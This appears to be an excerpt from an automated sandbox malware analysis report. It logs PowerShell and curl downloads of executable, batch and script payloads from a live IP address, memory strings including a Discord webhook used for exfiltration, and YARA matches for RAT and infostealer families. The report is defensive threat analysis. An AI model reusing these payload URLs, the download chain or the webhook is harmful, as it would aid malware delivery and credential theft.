00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 80 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1
                  Source: global trafficHTTP traffic detected: GET /infopage/grwsx.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /infopage/utres.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
                  Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: global trafficHTTP traffic detected: GET /infopage/wertxcp.bat HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                  Source: global trafficHTTP traffic detected: GET /infopage/wertxcp.bat HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /infopage/sfxqr.ps1 HTTP/1.1Host: 147.45.44.131User-Agent: curl/7.83.1Accept: */*X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                  Source: global trafficHTTP traffic detected: GET /infopage/grwsx.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /infopage/utres.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
                  Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                  Source: powershell.exe, 00000000.00000002.2146890283.0000027EAB702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDD7B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44
                  Source: powershell.exe, 00000000.00000002.2146890283.0000027EAB975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDDA12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDBFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDBFA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/grwsx.exe
                  Source: RegAsm.exe, 00000009.00000002.4597271061.0000000005630000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4578560689.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4579397342.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4602307651.0000000006480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1
                  Source: powershell.exe, 00000005.00000002.2253725513.0000029DD9D42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1.
                  Source: cvtres.exe, 00000008.00000002.2191070716.00000226E6ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1A
                  Source: csc.exe, 00000007.00000002.2193370475.000001EEBBE68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1S
                  Source: powershell.exe, 00000005.00000002.2348971545.0000029DF3D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1USERDOMAIN=user-PCUSERD
                  Source: RegAsm.exe, 00000009.00000002.4602307651.0000000006480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1USERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUS
                  Source: csc.exe, 00000007.00000003.2191411279.000001EEBBF06000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000002.2193640224.000001EEBBF06000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2191275065.000001EEBBF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1userdo
                  Source: cvtres.exe, 00000008.00000002.2190952003.00000226E6E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/sfxqr.ps1userdomain=user-PCuserdomain_roamingprofile=user-PCus
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDC076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2351543460.0000029DF4120000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000007.00000003.2191430981.000001EEBBEE2000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2192728985.000001EEBD7AB000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2191275065.000001EEBBEF3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.2191515346.000001EEBBEF3000.00000004.00000020.00020000.00000000.sdmp, nfy3200k.dll.7.dr, nfy3200k.0.cs.5.drString found in binary or memory: http://147.45.44.131/infopage/utres.exe
                  Source: powershell.exe, 00000000.00000002.2146890283.0000027EAB702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2146890283.0000027EAB975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180957409.0000027EC2276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/wertxcp.bat
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDDA9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.H
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.Hr
                  Source: RegAsm.exe, 00000009.00000002.4597271061.0000000005630000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.9.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: RegAsm.exe, 00000009.00000002.4580697643.00000000013D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en_
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                  Source: RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: powershell.exe, 00000000.00000002.2177874216.0000027EBA27F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177874216.0000027EBA13C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDBE0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000000.00000002.2146890283.0000027EAA0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDBB51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4582340011.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDBE0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000005.00000002.2351616241.0000029DF4177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: powershell.exe, 00000005.00000002.2351616241.0000029DF4177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.pkio
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDC076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                  Source: powershell.exe, 00000000.00000002.2146890283.0000027EAA0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDBB51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
                  Source: RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDC076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                  Source: powershell.exe, 00000005.00000002.2255186878.0000029DDBE0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000000.00000002.2146890283.0000027EAAD02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2255186878.0000029DDCAE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000000.00000002.2177874216.0000027EBA27F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177874216.0000027EBA13C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEBBD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                  Source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR

                  System Summary

                  barindex
                  Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 5.2.powershell.exe.29dddb68eb8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29ddc0bc858.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dddb632e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29ddc077076.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29ddc07a518.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dddab6a18.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dddaa185e.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 5.2.powershell.exe.29ddc077076.0.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
